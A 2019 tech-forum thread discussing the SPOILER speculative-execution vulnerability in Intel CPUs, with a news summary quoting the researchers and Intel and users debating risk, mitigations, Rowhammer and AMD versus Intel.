New Speculative Execution Bug Allegedly Affects Intel CPUs

Discussion in 'HardForum Tech News' started by AlphaAtlas, Mar 6, 2019.

  1. AlphaAtlas

    AlphaAtlas [H]ard|Gawd Staff Member

    Messages:
    1,713
    Joined:
    Mar 3, 2018
    Back in 2018, when the Spectre and Meltdown vulnerabilities were first publicized, many security experts feared that they opened a figurative Pandora's box. Those two exploits are part of a wider class of potential speculative execution flaws, and this week, those fears were realized, as researchers from Worcester Polytechnic Institute have revealed a new speculative execution exploit dubbed "Spoiler."

    Intel CPUs reportedly use "dependency resolution logic" to resolve false dependencies when speculatively executing load operations, and the researchers say "the dependency resolution logic suffers from an unknown false dependency independent of the 4K aliasing. The discovered false dependency happens during the 1 MB aliasing of speculative memory accesses which is exploited to leak information about physical page mappings." In that vein, the researchers claim this particular exploit only requires "a limited set of instructions," and that all Intel "Core" CPUs running on any operating system are vulnerable to the attack. The attack can be loaded with Javascript code from a website, without any need for privilege escalation beforehand, and the researchers successfully demonstrated the exploit on Nehalem, Sandy Bridge, and Ivy Bridge-based Xeon servers. Intel was reportedly informed of the exploit on December 1st, 2018, and they recently published this response:

    Intel received notice of this research, and we expect that software can be protected against such issues by employing side channel safe software development practices. This includes avoiding control flows that are dependent on the data of interest. We likewise expect that DRAM modules mitigated against Rowhammer style attacks remain protected. Protecting our customers and their data continues to be a critical priority for us and we appreciate the efforts of the security community for their ongoing research.

    The research paper's conclusion:

    While speculative execution enables both SPOILER and Spectre and Meltdown, our newly found leakage stems from a completely different hardware unit, the Memory Order Buffer. We exploited the leakage to reveal information on the 8 least significant bits of the physical page number, which are critical for many microarchitectural attacks such as Rowhammer and cache attacks. We analyzed the causes of the discovered leakage in detail and showed how to exploit it to extract physical address information. further, we showed the impact of SPOILER by performing a highly targeted Rowhammer attack in a native user-level environment. We further demonstrated the applicability of SPOILER in sandboxed environments by constructing efficient eviction sets from JavaScript, an extremely restrictive environment that usually does not grant any access to physical addresses. Gaining even partial knowledge of the physical address will make new attack targets feasible in browsers even though JavaScript-enabled attacks are known to be difficult to realize in practice due to the limited nature of the JavaScript environment. Broadly put, the leakage described in this paper will enable attackers to perform existing attacks more efficiently, or to devise new attacks using the novel knowledge.
     
    Last edited: Mar 6, 2019
    PaulP likes this.
  2. seanreisk

    seanreisk Gawd

    Messages:
    960
    Joined:
    Aug 29, 2011
    I know it isn't likely to affect me in a meaningful way, but now some of the luster is gone from my beautiful new computer. :(
     
  3. celeron300

    celeron300 Gawd

    Messages:
    514
    Joined:
    Jul 8, 2009
    Someone on Hardocp have a suggestion? Aside from going AMD?
     
  4. sirmonkey1985

    sirmonkey1985 [H]ard|DCer of the Month - July 2010

    Messages:
    21,521
    Joined:
    Sep 13, 2008
    and just when you thought the waterfall dried up... it rains..


    while most of this stuff sounds bad outside of corporate/business systems the risks are pretty low. i wouldn't go out and immediately buy an AMD system just because of these exploits even though the fear mongers will say otherwise. no one cares enough about the average users data when there are easier and cheaper ways to get your private information.
     
    Last edited: Mar 6, 2019
    M76 likes this.
  5. PeaKr

    PeaKr Gawd

    Messages:
    725
    Joined:
    Sep 6, 2004
    Disable javascript in your browser. I run with Palemoon along with the Toggle Javascript addon. I have trouble with a few sites, if I trust it I toggle java and reload. You could run a browser in a vm. A browser sandbox might also help, not sure.
     
  6. bobdabilder

    bobdabilder Limp Gawd

    Messages:
    291
    Joined:
    Oct 7, 2009
    I wouldn't go sticking my head in the sand.
     
  7. Legendary Gamer

    Legendary Gamer Gawd

    Messages:
    553
    Joined:
    Jan 14, 2012
    Any meaningful performance lead that Intel has, dies, if they patch all their security vulnerabilities. They just keep on coming too... It's been proven that Intel CPUs take massive hits from the previous threats. Stack this one on top and it gets even worse.

    HOWEVER, like others have said, this likely won't severely impact individual users. So, unless you're developing a new technology or are a professional writer and live and die by the content on your PC you will probably be fine. I'm rolling with Intel because, currently, it's fast single thread performance is where it's at for my older apps. Moving forward, if you don't already have a PC or are in the market looking for a new one, WAIT. 7nm Ryzen is 2-3 Months away. AMD's processors have, essentially, proven to be almost bulletproof compared to Intel and they are committed to correcting the previously noted security flaws in their new hardware. Not that much of this really even effected them anyway and their microcode updates that mitigate these issues rarely slow their CPUs down (last one was something like a 3% slowdowon compared to a 10-20+% slowdown Intel faced depending upon workload).

    I will stick with my Intel processors for now, however, Ryzen 7nm may very well change my mind.
     
  8. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    This is grossly foolish to say.

    These attacks are going to get simplified, evolved, and distributed just like all the other exploits that have become available over the years and eventually make their way into the more common virus kits.

    There is nothing about them that prevents that sort of thing from happening and they're flat out too good to ignore by the virus writers and hackers.

    Doubly so if the researchers' claims of the unlikely hood of a microcode patch being effective.
     
  9. BloodyIron

    BloodyIron 2[H]4U

    Messages:
    3,440
    Joined:
    Jul 11, 2005
    If you think this won't hit you, you're a fool. The fact this can be delivered through JavaScript means it can be injected into any hacked website and hit the masses. If you think the websites you visit are impenetrable, think again. Even websites like CNN have been hacked to deliver malicious code.

    The fact Intel still hasn't solved this at the silicon level clearly shows they don't actually care. Fuck you Intel.
     
  10. katanaD

    katanaD [H]ard|Gawd

    Messages:
    1,987
    Joined:
    Nov 15, 2016

    I would immediately unplug from the internet and format your computer, just to be sure

    you never know

    :ROFLMAO:
     
    Dayaks likes this.
  11. GHRTW

    GHRTW n00b

    Messages:
    37
    Joined:
    Aug 29, 2018
    7nm Rome chips cannot arrive soon enough for servers, cloud and data centers. Tables are turning hyper fast now...
     
  12. R_Type

    R_Type Limp Gawd

    Messages:
    213
    Joined:
    Mar 11, 2018
    I think the gist of it is there is no sandboxing this away. It's a very simple bit of code that reveals memory addresses, which are the keys to your whole system. The thing with all of these side channel attacks is that whereas your software is sandboxed/tightly controlled permissions and domains/whatever the hardware has none of these whatsoever in its prefetch/branch prediction/speculative execution units. So at a stroke all your security counts for diddly squat as key hardware blocks have an overview of everything everywhere and can be fooled into revealing everything at any time.
     
    Darth Kyrie and mesyn191 like this.
  13. arnemetis

    arnemetis 2[H]4U

    Messages:
    2,684
    Joined:
    Aug 2, 2004
    I'm trying this now, and it's effectively a worthless move. Every single website so far (hardforum for notifications, gmail, outlook.office.com, dropbox.com. google.com) has needed javascript to run correctly, and in several cases to run at all. If I'm just going to permit every website I visit to use it anyway, blocking it is somewhat stupid. I suppose it does prevent the random website you go to from running anything.
     
    Last edited: Mar 6, 2019
  14. kju1

    kju1 2[H]4U

    Messages:
    3,032
    Joined:
    Mar 27, 2002
    So youre saying all the individuals that were hit by ransomeware were just dolphins caught in the whale net? Color me unimpressed. Its incredibly foolish imo to say only businesses have to worry about this. Your entire life is electronic now...see how much youd like it if some enterprising enemy of yours decided he wanted to take everything and used a packaged up version of this to steal your shit.

    So your suggestion is to disable the internet?
     
  15. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    In fairness to Intel they only learned about this exploit at the very end of last year.

    There wouldn't be enough time to implement a hardware fix of some sort in any of their upcoming or current CPUs.

    If the memory model itself requires large changes in order to implement a fix that doesn't cause any performance degradations then it'll take quite a while before you see a hardware fix.
     
  16. Legendary Gamer

    Legendary Gamer Gawd

    Messages:
    553
    Joined:
    Jan 14, 2012
    The words Fair and Intel rarely ever coexist together properly .... The problem I see with the "new transparency" Intel is pushing is that they've said Jack and shit about correcting any of these issues in their upcomming 10nm generation. If I recall correctly there was some article about how the fixes weren't making it into that generation. Perhaps on 7nm in 2020-2021... On the AMD side of the spectrum, AMD has already committed to correcting these issues.

    Intel cannot correct these security holes if they want to remain competitive vs AMD and they've already lost their process lead.

    Intel is in deep shit for sitting on their asses too long and not innovating.
     
  17. PaulP

    PaulP Gawd

    Messages:
    776
    Joined:
    Oct 31, 2016
    Since this new exploit is is only useful to make other side-channel attacks for effective, deploying mitigations against those side-channel attacks is your only option right now.
     
  18. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    I agree! However I think this may be one of those few times.

    Do you mean this one (SPOILER) only or Meltdown and Spectre too? I believe they haven't commented on SPOILER but hardware corrections for Meltdown and Spectre should be implemented for Icelake and Coffeelake already has them.

    Absolutely!

    I believe AMD has a real chance to get a decent chunk of both server and desktop marketshare from Intel thanks to their screw ups. Not sure about AMD's prospects in the the laptop market on the other hand. AMD seems to be having a very hard time getting any traction there.

    As I understand it even with Spectre and Meltdown mitigations active SPOILER is still going to work unfortunately.

    That along with its reported ease of use and the difficulty (or perhaps impossibility if the researchers who developed SPOILER are correct) of Intel doing a effective microcode update is what is making it so very scary.
     
  19. R_Type

    R_Type Limp Gawd

    Messages:
    213
    Joined:
    Mar 11, 2018
    It isn't a simple fix. You could say they don't care or you could say it's a set of vulnerabilities that strike at the very heart of the means by which CPUs have been made faster for close to 15 years. The entire idea that speculative execution/memory prefetch/memory disambiguation could become a yawning security chasm was completely unforeseen until relatively recently and it took a good while to demonstrate proof of concept attacks. Now it's grown legs and there are attack vectors all over the place. It takes what.... 5 years to design and begin selling a cpu and the ip in it has been worked on and iterated for a decade+ and now they have to go back and somehow make sweeping changes without affecting performance. That's a job that will take years to do. Not to mention rowhammer (spam memory cells with bits billions of times until they freak out and flip 0 to 1 or vice versa) which just about every cpu in at least the last decade is vulnerable to and will be an absolute bitch to fix (in hardware)
     
  20. Grimlaking

    Grimlaking 2[H]4U

    Messages:
    2,921
    Joined:
    May 9, 2006
    Running a VM will not solve these for you. As a VCP I guarantee that we have to patch at the host level for these and the feeling is NOT negligible.
     
  21. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    This isn't correct. There are white papers from the P!!! and K7 Athlon era talking about doing attacks like this. And I can vaguely recall some people voicing worries about this sort of thing all the way back in the 90's when the Pentium Pro came out.

    It did take a long time to make those concepts into actual effective attacks but to say this was completely unforeseen is totally wrong. After all if it was totally unforeseen AMD's Zen would've been just as vulnerable to Spectre, Meltdown, and SPOILER. But it isn't.

    Intel was lax on security, favoring development efforts focused performance and power usage and now that mistake is coming back to bite them.

    Rowhammer is a memory flaw rather than a CPU flaw. Nothing Intel or AMD can really do to fix it. Its up to the DRAM OEM's to fix it. Maybe we'll see a fix with DDR5.

    What AMD or Intel can do is make it much harder for Rowhammer attacks to be successful by officially implementing and supporting ECC DRAM on all their products and not just server stuff. Technically and unofficially AMD already does and has done it for years, going on back to at least Bulldozer, they just don't guarantee it'll work properly 100% of the time on their consumer market stuff.

    Now some versions of Rowhammer apparently can work on even ECC DRAM but its a very slow process that can take weeks to be effective and I believe so far has only been shown to be effective on DDR3 ECC DRAM.
     
    Darth Kyrie and Red Falcon like this.
  22. R_Type

    R_Type Limp Gawd

    Messages:
    213
    Joined:
    Mar 11, 2018
    Thank you! I went and did some reading. You are correct. Learned something today.

    Re: rowhammer cpu vs ram problem. Well yes but ram is present in cpus, which I took as clear. Rowhammer flips bits.... to infer the contents of neighbouring memory cells. ECC has 2 problems vs rowhammer: flipping 3 or more bits defeats it (the tech needs improving) and it needs to be in every cache and dram pool on every cpu (cost). Like all side channel attacks rowhammer is evolving and has been demonstrated to affect ddr4. So whatever ddr5 brings to the table it better be pretty good.
     
    Red Falcon likes this.
  23. notarat

    notarat [H]ard|Gawd

    Messages:
    1,703
    Joined:
    Mar 28, 2010
    From what I read elsewhere, VM/Sandbox does not protect from this exploit. Don't have the link handy but I read this yesterday on /. so it's likely it was in the link there...
     
  24. Hakaba

    Hakaba Gawd

    Messages:
    639
    Joined:
    Jul 22, 2013
    i can see this being a pain for the home market, as for the server side. Well you shouldn’t be web surfing from a core, application, file server etc...
     
  25. Grimlaking

    Grimlaking 2[H]4U

    Messages:
    2,921
    Joined:
    May 9, 2006
    Better tell that to every enterprise running VDI's. (Virtual Desktops.) Especially some of the smaller shops that might have a small vm cluster with independent VDI's for the users that co mingle on their server VM hosts because it didn't make sense to buy more. Oh and anyone running a virtual desktop say in the Amazon Cloud or any other cloud for that matter.
     
  26. BloodyIron

    BloodyIron 2[H]4U

    Messages:
    3,440
    Joined:
    Jul 11, 2005
    Speculative (Spectre/Meltdown) security threats have been known to intel for about two years now (or more perhaps behind closed doors). I have yet to see them come out with a silicon solution for _ANY_ of them. Until they actually come at their silicon from a security perspective, this will continue to get worse, and not be comprehensively addressed.

     
  27. BloodyIron

    BloodyIron 2[H]4U

    Messages:
    3,440
    Joined:
    Jul 11, 2005
    Yes I can say they don't care, because they've known about speculative exploits for about two years now, and they haven't put out ANY silicon solutions to mitigate them. That's negligent.

     
  28. arnemetis

    arnemetis 2[H]4U

    Messages:
    2,684
    Joined:
    Aug 2, 2004
    On the one hand I agree with you, this is unacceptable, should have dumped everything they had into a hardware level fix immediately. But on the other, I think the reality is this would take a redesign that will take years, if not decades, to implement. In the mean time, should they just shut down the fabs, produce nothing? When a solution is finally revealed that completely abandons speculative execution (the only real way to protect against this,) it will likely be many years from now, perform much worse than today's chips, and cost a fortune.
     
  29. ole-m

    ole-m Limp Gawd

    Messages:
    451
    Joined:
    Oct 5, 2015
    vm's do not protect against this.....
     
  30. jmilcher

    jmilcher [H]ardness Supreme

    Messages:
    4,306
    Joined:
    Feb 3, 2008
    Going AMD.

    I’ll be eagerly awaiting the Zen2 update this year with a motherboard that’s guaranteed to accept the cpu. My 2700x has been great so far.

    It’s been the first time I’ve built AMD since the Opteron 165 days.

    I’m done with the new monthly threats and performance robbing patches from intel.
     
    ccityinstaller likes this.
  31. NoOther

    NoOther [H]ardness Supreme

    Messages:
    6,477
    Joined:
    May 14, 2008
    I wouldn't hold your breath on that. The nature of how these attacks and how they are pulled off combined with the time frame you have to do an attack to get the information you are looking for, makes it hardly worth exploit writers time. There is zero guarantee on the kind of information you could get, or that you get any useful information at all. So it really limits the targets for these attacks.
     
  32. Hakaba

    Hakaba Gawd

    Messages:
    639
    Joined:
    Jul 22, 2013
    Ohh I would, if you are running core services and desktops on the same server I believe that is a foul. The thin client/zero client/virtual solution should be separate even on the hardware level.

    As for Amazon, it will be interesting to see how that all plays out. Because meltdown has existed for several years and yet AWS is still here...
     
  33. Grimlaking

    Grimlaking 2[H]4U

    Messages:
    2,921
    Joined:
    May 9, 2006
    This last speculative execution CVE that came out late 2018 is only patched at the Hypervisor level. And if you have the patch enabled you only have access to your core CPU's no Hyperthreaded Logical CPU's for you. My environment due to what I do was over built and ok. But can you imagine people using 4:1 overallocation on logical threads that are now simply screwed? It suddenly became 8:1.
     
  34. TordanGow

    TordanGow [H]ard|Gawd

    Messages:
    1,245
    Joined:
    May 25, 2015
    And to that I say GOOD! I'm glad to see Intel reaping what they sowed. The way i see it is they wanted to milk the consumer and intentionally neglected meaningful improvement due to no competition. They wanted to sell the same thing over and over year after year with minimal changes. My next PC will be AMD, my last one would have been but I couldn't get AMD parts timely to replace a dead PC as it died a few days after ryzen launch. I'll intentionally be avoiding Intel products now. Their misfortune makes me smile.
     
    Darth Kyrie and Red Falcon like this.
  35. Krenum

    Krenum [H]ardForum Junkie

    Messages:
    15,560
    Joined:
    Apr 29, 2005
    AMD Zen 3 can't launch fast enough.
     
  36. Red Falcon

    Red Falcon [H]ardForum Junkie

    Messages:
    9,990
    Joined:
    May 7, 2007
    Even if x86-64 doesn't die from all of these flaws, ARM-based CPUs and AMD are going to continue moving forward.
    Good riddance, Intel.
     
    trparky likes this.
  37. jmilcher

    jmilcher [H]ardness Supreme

    Messages:
    4,306
    Joined:
    Feb 3, 2008
    Well it’s Zen2, which is the third gen of zen.
     
  38. Krenum

    Krenum [H]ardForum Junkie

    Messages:
    15,560
    Joined:
    Apr 29, 2005
    Technically yes, but it is the third chip in the line of Ryzen so I say Zen 3.
     
  39. fullvietFX

    fullvietFX [H]ard|Gawd

    Messages:
    1,785
    Joined:
    Sep 1, 2004
    Damnit lol. Just built my Intel rig.
     
  40. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    That approach only works with DDR3 ECC DRAM so far.

    It hasn't been shown to work with DDR4 ECC DRAM. The DRAM OEM's were aware of Rowhammer type attacks in the early DDR3 days and hardened DDR4 ECC DRAM to make it at least resistant to it (they claim its proofed against it). The guys who figured out how to do the 3 bit flip on DDR3 ECC DRAM claim DDR4 ECC DRAM is still susceptible to it but its been quite a while since those claims were made and no real world proof of concept of the attack has been successfully performed yet.

    So at a minimum DDR4 ECC DRAM (which is what Zen, Zen+, Zen2, Skylake, and so on all support) is fairly well hardened against that sort of attack and may indeed be actually completely proof against it.

    Actually Rowhammer attacks only works on system RAM and not the CPU caches.

    Rowhammer attacks won't work on the CPU caches because they're designed in a physcially different manner. The actual transistors in the SRAM arrays in those caches are hardened against physical abuse like that and have much more stringent quality control too. Rowhammer only works at all because the DRAM industry was focused on trying to make memory as cheap as possible to improve their profits so they cheaped out durability and security and tried to maximize DRAM cell transistor density with further process shrinks.

    The DRAM OEM's already know how to prevent Rowhammer attacks from working, they just don't want to. Maybe with this latest attack they'll be embarassed enough that they'll actually bother to really fix the problem with DDR5.

    But Coffeelake and Whiskeylake already have hardware mitigations against Meltdown and Spectre right?

    The researchers claim they were able to get successful attacks within seconds though. If it was taking weeks to perform a single successful attack then you'd have a point.

    Not really.

    A fast executing attack means the attack can be re-ran over and over and over quickly without issue and "eventually" (in scare quotes because we're probably talking about a time frame of minutes not hours or days or weeks) the attacker will find what they want.

    Zen+ was a bug fixed Zen along with a minor process improvement (it wasn't a optical shrink so think of Globalfoundries "12nm" as a "14nm+" instead) rather than a new evolution of the Zen architecture.

    Zen2 has actually large and significant changes to the architecture itself and isn't just a bug fix or a shrink so you should think of it as the 2nd generation core and not the 3rd.
     
    Darth Kyrie and CoreStoffer like this.